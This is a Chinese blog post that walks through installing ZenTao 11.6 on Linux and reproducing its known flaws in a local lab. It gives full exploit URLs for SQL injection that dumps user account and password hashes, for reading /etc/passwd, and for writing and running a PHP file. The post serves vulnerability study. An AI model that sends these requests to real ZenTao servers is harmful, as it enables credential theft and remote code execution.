Linux安装禅道11.6并进行漏洞复现

最新推荐文章于 2024-07-06 00:02:53 发布
最新推荐文章于 2024-07-06 00:02:53 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: 实习期
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/108260799
版权

一、安装禅道

1、下载禅道11.6

wget https://www.zentao.net/dl/zentao/11.6/ZenTaoPMS.11.6.stable.zbox_64.tar.gz`

2、解压到opt目录下

sudo tar -zxvf  ZenTaoPMS.11.6.stable.zbox_64.tar.gz -C /opt

3、开启Apache和Mysql

/opt/zbox/zbox start

4、浏览器访问禅道登录页面

http://127.0.0.1/

在这里插入图片描述

查看版本信息

 http://127.0.0.1/zentao/index.php?mode=getconfig

在这里插入图片描述

5、创建新用户

admin/123456登录

在这里插入图片描述

创建新用户test/CD87691043cs并登录
以上,禅道11.6已经安装好。

二、漏洞复现

1、SQL注入

访问下面网址,可以看到用户信息

http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user

在这里插入图片描述

2、文件读取

访问下面网址,可以看到指定文件

http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd

在这里插入图片描述

3、RCE

POST请求包发送数据

http://192.168.59.128/zentao/api-getModel-editor-save-filePath=/tmp/1111

fileContent=<?php phpinfo()?>

(放在tmp下是因为其他目录可能有权限限制,不一定可以写进去)

在这里插入图片描述

查看文件1111已经写入到tmp下

在这里插入图片描述

访问1111文件
POST发送请求包

http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/1111

fileContent=<?php phpinfo()?>

没有成功,查看源代码,发现需要给物理路径加上一层才可以。

http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/1111/1

fileContent=<?php phpinfo()?>

在这里插入图片描述

per_se_veran_ce
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
禅道项目管理系统RCE漏洞复现+利用
0xSec
02-01 1万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
【组件攻击链】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用
further_eye的博客
12-21 4626
近年来禅道漏洞频发,从2018年开始,每年都会爆出比较严重的高危漏洞,通过这些高危漏洞均可对服务器造成一定的影响,甚至可以获取服务器的最高权限。
禅道身份认证绕过漏洞(QVD-2024-15263)复现
fly夏天的博客
06-19 861
QVD-2024-15263 禅道身份认证绕过漏洞复现和原理介绍。
搭建bug管理客户端 禅道
一条路走到黑
10-21 225
禅道安装 下载源码 wget http://dl.cnezsoft.com/zentao/11.6.4/ZenTaoPMS.11.6.4.zbox_64.tar.gz 解压到/opt文件夹 不要 解压到别的目录再拷贝到/opt/,因为这样会导致文件的所有者和读写权限改变, 也不要解压后把整个目录777权限 。 sudo wget -axvf ZenTaoPMS.11.6.4.zbox_64....
红队中的一些重点系统漏洞整理(通用的一些漏洞
qq_50854662的博客
02-20 770
红队中的一些重点系统漏洞整理(通用的一些漏洞
禅道研发项⽬管理系统未授权RCE漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-09 945
Zendao禅道是第一款国产的开源项目管理软件,他的核心管理思想基于敏捷方法scrum,内置了产品管理和项目管理,同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能。
禅道项目管理软件 v11.6.5 开源版
08-22
禅道项目管理软件 v11.6.5 开源版》是一款专为研发项目设计的全面管理工具,旨在提供一站式的解决方案,帮助团队高效、有序地进行项目管理。这款软件是中国首款开源的项目管理软件,它融合了多个关键领域的功能,...
禅道项目管理软件 v11.6.1 开源版
11-06
禅道项目管理软件,作为国内首款开源的项目管理解决方案,为各类研发团队提供了一站式的项目管理工具。在v11.6.1版本中,它延续了对项目生命周期全面覆盖的特点,旨在帮助用户高效地进行产品规划、任务分配、质量...
ZenTaoPMS.11.6.5.zip
05-28
通过以上步骤,你可以在Linux环境中顺利安装并运行禅道11.6.5。在使用过程中,你可以根据实际需求进行定制和扩展,利用禅道的强大功能来提升团队协作和项目管理的效率。记住,定期更新和备份数据库及源码,以保证...
禅道项目管理软件 v11.6.4 开源版
11-05
禅道项目管理软件 v11.6.4 开源版》是一款专为研发项目管理设计的综合性软件,由国内团队开发并以开源形式提供。它涵盖了项目管理的多个重要领域,包括产品管理、项目管理、质量管理、文档管理、组织管理和事务...
cudnn-linux-x86-64-8.4.0.27-cuda11.6 cudnn linux cuda11.6版本包
05-10
nvida官网很难下载 故备份一下这是 文件太大拆成两个 这是第二个 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux cuda11.6版本包cudnn-linux-x86_64-8.4.0.27_cuda11.6 cudnn linux ...
禅道项目管理软件 v11.6.3 开源版
10-21
禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。注重实效的管理思想,合理的软件架构,简洁高效的操作,优雅的代码实现,灵活的扩展机制,强大而易用的api调用机制,多语言支持,多风格支持,搜索功能,统计功能——这一切,您通过禅道,都可以拥有!禅道在手,项目无忧!禅道的功能列表:1. 产品管理:包括产品、需求、计划、发布、路线图等功能。2. 项目管理:包括项目、任务、团队、build、燃尽图等功能。3. 质量管理:包括bug、测试用例、测试任务、测试结果等功能。4. 文档管理:包括产品文档库、项目文档库、自定义文档库等功能。5. 事务管理:包括todo管理,我的任务、我的Bug、我的需求、我的项目等个人事务管理功能。6.  组织管理:包括部门、用户、分组、权限等功能。7.  统计功能:丰富的统计表。8.  搜索功能:强大的搜索,帮助您找到相应的数据。9.  灵活的扩展机制,几乎可以对禅道的任何地方进行扩展。10. 强大的api机制,方便与其他系统集成。
禅道 11.6版本 后台漏洞 复现和审计
weixin_45427650的博客
04-04 2929
文章目录查看版本漏洞sql注入任意文件读取rce 禅道 11.6版本下载地址 本次复现环境windows 先搞清楚禅道参数的传递方式,进入index.php慢慢看 先发现了这个语句: 这个导致禅道的查看版本信息的漏洞 跟进看一下 查看版本漏洞 复现payload:http://ip/zentao/index.php?mode=getconfig 跟进exportConfig() 文件位置:zentao\framework\router.class.php 调用父类的exportConfig()
pymssql中执行sql sever为什么会乱码_禅道免登陆SQL注入漏洞复现
weixin_39645249的博客
12-12 146
一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取w...
漏洞复现禅道——未授权登入(QVD-2024-15263)
最新发布
LongL_GuYu的博客
07-06 377
禅道Zentao)是一款开源的项目管理和协作软件。禅道项目管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现未授权登录。
禅道项目管理系统身份认证绕过漏洞复现(QVD-2024-15263)
0xSec
04-28 1618
2024年4月,互联网披露禅道系统存在身份认证绕过的漏洞情报。经分析,确认该漏洞利用简单,并可能在绕过权限后利用后台其他漏洞实现远程代码执行,建议受影响的客户尽快修复漏洞
漏洞复现】利用禅道系统RCE命令执行漏洞反弹shell
刘家华(游戏开发)
04-23 1206
禅道系统RCE漏洞复现
禅道11.6 docker安装以及漏洞复现
qq_44122254的博客
12-09 1050
禅道11.6 docker安装以及漏洞复现
linux安装cuda11.6
07-27
要在Linux安装CUDA 11.6,您可以按照以下步骤进行操作: 1. 首先,确保您的系统满足以下要求: - 支持的NVIDIA GPU(查看CUDA支持的GPU列表) - 安装了支持的Linux发行版(如Ubuntu、CentOS等) - 已安装适当...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值